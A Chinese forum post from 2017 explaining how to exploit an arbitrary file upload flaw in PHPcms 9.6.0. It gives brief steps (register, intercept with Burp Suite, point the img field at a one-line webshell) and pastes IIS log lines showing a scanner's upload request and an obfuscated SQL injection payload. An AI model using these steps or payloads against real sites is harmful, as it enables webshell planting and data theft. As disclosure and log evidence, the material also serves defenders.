灰儿 发表于 2017-4-12 17:30:55

PHPcms9.6.0 最新版任意文件上传漏洞(20170411首次曝光)

漏洞利用方法:
1.在前台注册一个账号,以下为黑客注册的账号截图



2.然后 用burpsuite抓包工具修改数据,

只需要修改img里面的链接为你本地写入的一句话即可,还有要注意的是在repeater里测试go时每一次都要修改username,password和email字段值(不能重复,汗)


再提交修改后的数据。

操作详情参见:
http://www.admin365.cn/thread-40920-1-1.html

IIS7.5日志(IIS日志时间加上八小时才是当地时区正确时间):IIS默认的日志格式就是W3C标准日志文件。北京时间是东八时区,也就是GMT+8,IIS在记录时间时就会在系统时间基础上加上8小时,所以,你那服务器的日志文件记录的时间久延后了八个小时,但实际上仍然是实时记录的。

2017-04-11 09:41:29 115.28.167.163 POST /index.php m=member&c=index&a=register&siteid=1 80 - 140.205.201.42 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;Alibaba.Security.Heimdall.6537713.phpcmsv9-register-upload) 200 0 0 750

2017-04-11 09:41:29 115.28.167.163 GET /uploadfile/2017/0411/20170411054129219.php - 80 - 140.205.201.42 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;Alibaba.Security.Heimdall.6537713.phpcmsv9-register-upload) 200 0 0 15


2017-04-11 09:41:37 115.28.167.163 GET /index.php m=wap&a=index&siteid=1 80 - 140.205.201.42 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;Alibaba.Security.Heimdall.6537713.phpcmsv9-attachment-sql) 200 0 0 93


2017-04-11 09:41:37 115.28.167.163 GET /index.php m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=%*27a*nd%20ex*p(~(sele*ct%25*2afro*m(sele*ct+co*nc*at(0x7e,md5(233333),0x7e))x))%23%26m%3D1%26f%3Dtest%26modelid%3D2%26catid%3D6 80 - 140.205.201.42 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;Alibaba.Security.Heimdall.6537713.phpcmsv9-attachment-sql) 200 0 0 93


2017-04-11 09:41:37 115.28.167.163 GET /index.php m=content&c=down&a_k=2544xzBsLFto1G8e3RJXa6x3CJlLd2X2GLrP2J9O4KvuMR6j7GVKPwBV1i7B2j3goZeaaDSWMkGzIWqLmikBedoL97mMTKDPSaIN7c14KNc9SH5aFQlk-oCu3eiSGlL1REMiHK0RKnyWJyaMVAaNydYXxYLaLkrFlI0JI33toa0_JRdKzMUKwJ6VWqNQBoFe_lJ7AmI7stBw81GZSHKvGGjF 80 - 140.205.201.42 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;Alibaba.Security.Heimdall.6537713.phpcmsv9-attachment-sql) 200 0 0 125





页: [1]
查看完整版本: PHPcms9.6.0 最新版任意文件上传漏洞(20170411首次曝光)